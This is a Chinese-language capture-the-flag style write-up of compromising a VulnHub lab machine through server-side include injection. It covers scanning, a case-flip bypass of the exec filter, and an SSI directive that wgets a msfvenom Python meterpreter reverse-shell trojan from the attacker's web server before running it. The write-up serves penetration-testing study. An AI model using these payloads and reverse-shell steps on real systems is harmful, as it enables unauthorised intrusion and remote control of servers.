SSI注入实战
文章目錄
- 靶機環境
- 一、服務器信息搜集
- 二、網站信息搜集
- 1.使用nikto掃描網站目錄
- 2.瀏覽網站
- 三、SSI注入漏洞利用
- 1、SSI注入簡介:
- 2、SSI注入測試網站
- 四、利用nc反彈shell——失敗
- 五、使用msf框架
- 1、python木馬生成
- 2、建立木馬監聽端
- 3、上傳木馬文件到本地web服務器上
- 4、構造SSI注入語句執行木馬
靶機環境
靶機下載網站:https://www.vulnhub.com/
使用Vmware虛擬機中NAT網絡
靶機 192.168.146.150
攻擊機 parrot 192.168.146.129
一、服務器信息搜集
-A 全面掃描(主動掃描)
-p-全端口掃描
👆發現只有開放80端口,并且服務器用的是Ubuntu,中間件為Apache
二、網站信息搜集
1.使用nikto掃描網站目錄
nikto 是一款用來發現 web 應用程序漏洞的一個工具,常用于對web網頁服務器進行全面的多種掃描
nikto -h http://192.168.146.150掃描出敏感文件/spukcab/,并且響應為200
↓訪問其url發現兩個備份文件
分別下載到Download里面
分別查看審計👇,但是并沒發現什么有價值的信息哦~
分別是網頁源代碼和配置信息
2.瀏覽網站
首先是一個登錄界面
開burpsuite抓包看一下
代碼如下(示例):
并沒有發現什么可利用的地方
三、SSI注入漏洞利用
1、SSI注入簡介:
Server Side Injection,即服務器端注入。SSI 是類似于 CGI,用于html動態頁面的指令。
若網站目錄中發現了stm shtml shtm 的文件后綴名,并且網站對ssi的輸入沒有進行嚴格過濾
就有可能允許遠程在 Web 應用中注入腳本來執行代碼,造成SSI注入攻擊。
2、SSI注入測試網站
都輸入👇并且點擊submit提交
<!--#exec cmd="whoami" -->
關鍵敏感字符可能被過濾掉了
考慮大寫翻轉進行繞過再提交
注入測試成功😄O(∩_∩)O
四、利用nc反彈shell——失敗
ps:本靶機利用nc正向和反向反彈shell經測試后都行不通
parrot建立監聽
提交后parrot上沒有反應——失敗/(ㄒoㄒ)/~~
五、使用msf框架
1、python木馬生成
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > shell.py
2、建立木馬監聽端
msfconsole use exploit/multi/handler set payload python/meterpreter/reverse_tcp set lhost 192.168.146.129 set lpoet 4444 exploit3、上傳木馬文件到本地web服務器上
先把剛剛制作好的python木馬移動到var/www/html里
sudo mv /root/shell.py /var/www/html
**開啟apache服務**
4、構造SSI注入語句執行木馬
<!--#EXEC cmd="wget http://192.168.146.129/shell.py"-->
給傳上去的木馬文件加權限👇
執行木馬
成功上線😀,收工啦~~
總結
- 上一篇: 定制Linux系统安装盘,syslinu
- 下一篇: 小程序公众号干货运营之注销篇